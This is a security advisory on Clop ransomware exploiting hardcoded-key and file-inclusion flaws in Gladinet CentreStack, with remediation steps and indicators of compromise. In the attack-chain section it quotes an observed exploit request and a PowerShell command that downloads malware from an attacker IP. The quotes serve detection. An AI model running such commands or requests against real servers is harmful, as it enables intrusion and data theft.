Clop Ransomware Targets Gladinet CentreStack in Data Theft Attacks

What is CentreStack and Why It’s Being Targeted

Gladinet CentreStack is a popular enterprise file-sharing platform used by thousands of businesses across 49 countries. It allows organizations to securely share files stored on their own servers through web browsers, mobile apps, and mapped network drives without requiring a VPN connection. This makes it an attractive solution for companies supporting remote workers who need access to corporate files.

The platform essentially bridges traditional on-premises file storage with modern cloud-like accessibility features. Organizations can turn their existing file servers, NAS devices, or cloud storage into secure, enterprise-grade private cloud storage systems.

Unfortunately, this widespread adoption and the sensitive nature of the data stored in these systems make CentreStack an ideal target for cybercriminals like the Clop ransomware gang. When attackers compromise a CentreStack server, they gain access to an organization’s entire file repository, potentially including financial records, customer data, intellectual property, employee information, and other confidential business documents.

The Vulnerability Behind the Attacks

Security researchers from Huntress uncovered the root cause of this security crisis: CentreStack and TrioFox contain hardcoded cryptographic keys in their AES encryption implementation. This fundamental security flaw, tracked as CVE-2025-14611 with a severity score of 7.1 out of 10, allows attackers to decrypt and forge authentication tickets that normally protect file access.

The problem stems from how these applications generate encryption keys. When the CentreStack server starts, it calls an external function that returns the same static strings every time:

• The encryption key source: A hardcoded string of Chinese text
• The initialization vector source: A hardcoded string of Japanese marketing text

Because these cryptographic keys never change across installations, attackers who discover them once can use them against any vulnerable CentreStack or TrioFox server worldwide.

Additionally, attackers are exploiting CVE-2025-11371, an unauthenticated Local File Inclusion (LFI) vulnerability that allows them to retrieve sensitive configuration files without needing any login credentials. By combining these vulnerabilities, threat actors can:

1. Access the server’s web.config file containing machine keys
2. Use those machine keys to perform ViewState deserialization attacks
3. Execute arbitrary code remotely on the compromised server
4. Steal sensitive data stored on the system

How the Attack Works

The Clop ransomware group has developed a sophisticated attack chain that exploits these vulnerabilities in a step-by-step process:

Step 1: Scanning for Vulnerable Servers

Attackers scan the internet for servers displaying the “CentreStack – Login” page, identifying potential targets. Recent scan data shows at least 200 unique IP addresses running vulnerable CentreStack installations.

Step 2: Exploiting the Cryptographic Flaw

Using the hardcoded encryption keys, attackers create specially crafted “access tickets” that decrypt to reveal file paths, credentials, and timestamps. In observed attacks, threat actors set timestamps to the year 9999, creating tickets that never expire and can be reused indefinitely.

Step 3: Retrieving Configuration Files

Attackers send malicious requests to download the server’s web.config file, which contains critical machine keys needed for the next stage of the attack. One example of an encrypted request seen in the wild:

/storage/filesvr.dn t=vghpI7EToZUDIZDdprSubL3mTZ2:aCLI:8Zra5AOPvX4TEEXlZiueqNysfRx7Dsd3P5l6eiYyDiG8Lvm0o41m:ZDplEYEsO5ksZajiXcsumkDyUgpV5VLxL%7C372varAu

Step 4: Executing Malicious Code

Using the stolen machine keys, attackers perform ViewState deserialization attacks to execute PowerShell commands on the server. In recent incidents observed by Huntress, attackers executed commands like:

Invoke-WebRequest http://185.196.11.207:8000/conqueror.exe -OutFile C:\Users\Public\conqueror.exe

This downloaded malware that enabled further system reconnaissance and data theft.

Step 5: Data Exfiltration

Once attackers establish a foothold, they execute enumeration commands to map the system, identify valuable data, and exfiltrate sensitive files to their own servers.

Step 6: Extortion

After stealing data, Clop leaves ransom notes on compromised servers and publishes stolen information on their dark web leak site, pressuring victims to pay ransoms to prevent public disclosure.

Clop’s Track Record of Targeting File Transfer Systems

The Clop ransomware gang (also known as Cl0p) has established itself as one of the most prolific cybercrime groups specializing in exploiting file transfer and file-sharing platforms. This Russian-speaking ransomware-as-a-service operation first appeared in February 2019 and has been behind some of the largest data theft campaigns in recent years.

Previous Major Campaigns:

• MOVEit Transfer (2023): One of the largest ransomware campaigns in history, exploiting an SQL injection zero-day (CVE-2023-34362) that impacted over 2,770 organizations worldwide, including government agencies, healthcare providers, and major corporations
• Oracle E-Business Suite (2025): Since August 2025, Clop has exploited zero-day CVE-2025-61882, stealing data from Harvard University, The Washington Post, Logitech, University of Pennsylvania, University of Phoenix, and Envoy Air (an American Airlines subsidiary)
• GoAnywhere MFT (2023): Exploited CVE-2023-0669 to compromise over 130 organizations
• Accellion FTA (2020-2021): Targeted approximately 100 organizations through zero-day vulnerabilities in this legacy file transfer appliance
• Cleo File Transfer: Exploited a zero-day remote code execution flaw in data theft attacks

High-profile victims across these campaigns include Shell, British Airways, Bombardier, University of Colorado, PwC, BBC, and multiple healthcare organizations including Barts Health NHS.

The U.S. Department of State has offered a $10 million reward for information that could link Clop’s attacks to a foreign government, underscoring the group’s significance as a national security threat.

Who Is at Risk

Any organization running internet-facing Gladinet CentreStack or TrioFox servers is potentially at risk, particularly if they haven’t applied the latest security updates. Based on intelligence from security researchers, the following are especially vulnerable:

Industries Most Affected:

• Healthcare organizations storing patient records and medical data
• Technology companies with intellectual property and source code
• Financial services firms with customer financial information
• Legal firms with confidential client files
• Manufacturing companies with proprietary designs and trade secrets
• Educational institutions with student and research data

Specific Risk Factors:

• Running CentreStack or TrioFox versions older than 16.12.10420.56791
• Having file servers exposed directly to the internet without additional security layers
• Not implementing network segmentation or access controls
• Failing to rotate machine keys after vulnerability disclosures
• Not monitoring logs for suspicious access patterns

As of mid-December 2025, Huntress has identified at least nine organizations that have been successfully compromised through these vulnerabilities, with attacks originating from multiple IP addresses including 147.124.216.205 and 146.70.134.50.

What You Should Do Now

If your organization uses CentreStack or TrioFox, you should take immediate action to protect your systems and data:

Immediate Actions (Do These Today):

1. Update to the latest version: Install CentreStack version 16.12.10420.56791 or TrioFox version 16.12.10420.56791 released on November 29, 2025
2. Rotate your machine keys: Follow Gladinet’s instructions to rotate machine keys in your web.config file
3. Check your logs: Search server logs for the string vghpI7EToZUDIZDdprSubL3mTZ2, which indicates attempts to access the web.config file
4. Review access logs: Look for unusual access patterns, especially requests to /storage/filesvr.dn with encrypted parameters

Additional Security Measures:

1. Implement network segmentation: Don’t expose CentreStack servers directly to the internet; place them behind VPNs or zero-trust access solutions
2. Enable multi-factor authentication: Require MFA for all administrative accounts on Gladinet systems
3. Monitor for suspicious activity: Set up alerts for failed login attempts, unusual file access patterns, and configuration changes
4. Back up critical data: Ensure you have offline backups that can’t be accessed or encrypted by attackers
5. Review user permissions: Apply the principle of least privilege, ensuring users only have access to files they absolutely need
6. Consider temporary mitigation: If you can’t update immediately, disable the temp handler in UploadDownloadProxy’s web.config (note: this will affect some functionality)

Signs Your System May Be Compromised

Watch for these indicators that your CentreStack or TrioFox server may have been breached:

Log File Indicators:

• Requests containing the encrypted string vghpI7EToZUDIZDdprSubL3mTZ2
• Connections from suspicious IP addresses like 185.196.11.207, 147.124.216.205, or 146.70.134.50
• PowerShell execution via w3wp.exe (the IIS worker process)
• Base64-encoded commands in web server logs
• Failed ViewState deserialization errors in Windows Application Event Logs

System Behavior:

• Unexpected PowerShell processes running under the IIS application pool identity
• New files appearing in C:\Users\Public\ directory (especially files named like “conqueror.exe”)
• Unusual outbound network connections to unfamiliar IP addresses
• Configuration files being accessed at unusual times
• Ransom notes appearing on file servers

File System Changes:

• Modifications to web.config files
• New executable files in system directories
• Unexpected changes to file permissions or access control lists
• Files being copied or downloaded in bulk

If you observe any of these indicators, immediately disconnect the affected server from the network, preserve logs for forensic analysis, and contact your security team or a cybersecurity incident response firm. You should also report the incident to law enforcement and, depending on your industry and location, to relevant regulatory authorities.

Organizations that discover they’ve been compromised should also check if their data has been published on Clop’s dark web leak site and prepare for potential notification requirements under data breach laws like GDPR, HIPAA, or state-level regulations.

Source

• BleepingComputer – Clop ransomware targets Gladinet CentreStack in data theft attacks
• Huntress – Active Exploitation of Gladinet CentreStack/Triofox Insecure Cryptography Vulnerability
• Security Affairs – CLOP targets Gladinet CentreStack servers in large-scale extortion campaign
• Curated Intelligence – PSA on Clop CentreStack Campaign